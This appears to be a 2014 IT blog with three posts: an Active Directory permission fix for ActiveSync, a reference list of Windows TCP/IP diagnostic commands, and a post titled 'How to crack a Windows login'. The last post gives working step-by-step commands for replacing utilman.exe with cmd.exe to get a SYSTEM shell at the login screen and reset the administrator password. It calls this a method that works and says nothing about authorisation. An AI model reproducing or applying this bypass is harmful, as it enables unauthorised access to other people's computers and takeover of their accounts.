Wednesday, May 21, 2014

An AD setting that can make or break Active-Sync to your mobile device

Open Active Directory Users and Computers

Click View menu

Select Advanced Features

Locate the user in Active Directory, select Properties on the user profile

Open the Security tab

Click Advanced button at the bottom of the Security tab

Make sure "Include inheritable permissions from this object's parent" is checked

Saturday, May 10, 2014

Troubleshooting TCP/IP

ArpAllows viewing and editing of the Address Resolution Protocol (ARP) cache.
HostnameDisplays the host name of the computer.
IpconfigDisplays the current TCP/IP configuration for both IPv4 and IPv6. Also used to manage Dynamic Host Configuration Protocol (DHCP)-allocated IPv4 address configurations,           display or flush the DNS client resolver cache, and register DNS names.
NbstatDisplays NetBIOS over TCP/IP (NetBT) configuration and allows management of the NetBIOS name cache.
NetshConfiguration tool for many network services. For each network service, there is a context containing commands specific for that service. For the netsh interface ip and netsh interface ipv6 contexts, displays and administers TCP/IP protocol settings on either the local computer or a remote computer.
NetstatDisplays protocol statistics and information on current TCP connections.
NslookupPerforms DNS queries and displays the results.
PingSends Internet Control Message Protocol (ICMP) Echo or Internet Control Message Protocol for IPv6 (ICMPv6) Echo Request messages to test reachability.
RouteAllows viewing of the IPv4 and IPv6 routing tables and editing of the IPv4 routing table.
TracertSends ICMP Echo and ICMPv6 Echo Request messages to trace the network route taken by IPv4 or IPv6 packets to a specific destination.
PathpingSends ICMP Echo or ICMPv6 Echo Request messages to trace the route an IPv4 or IPv6 packet takes to a destination and displays information on packet loss for each router and link in the path.
SNMP serviceProvides status and statistical information to Simple Network Management System (SNMP) management systems.
NetdiagRuns a series of diagnostic tests on network components. Netdiag is installed as part of the Windows XP and Windows Server 2003 Support Tools in the Support\Tools folder of the Windows XP or Windows Server 2003 product CD-ROM.
TelnetTests TCP connection establishment between two nodes.
TtcpListens for and sends TCP segment data or UDP messages between two nodes. Ttcp.exe is provided with Windows XP Service Pack 2 in the Valueadd\Msft\Net\Tools folder of the Windows XP Service Pack 2 CD-ROM

How to crack a Windows login

command: net user [username] [password]

here's a method that works

boot the computer into a mode that gives you access to the command prompt. if you use a windows installer, select the repair computer option

a the command prompt, change directory to c:\windows\system32

copy “cmd.exe” to replace “utilman.exe” using the following commands:

move utilman.exe utilman.bak

copy cmd.exe utilman.exe

reboot the computer

boot the computer in normal mode, at the windows login screen use crtl+alt+del to open the windows login dialog, then use windowskey+u and the command prompt should open

in the command prompt window type the following command:

net user [username] [password]

make [username] the name of the administrator account, and [password] will be your new password

close the command prompt window and login with your new password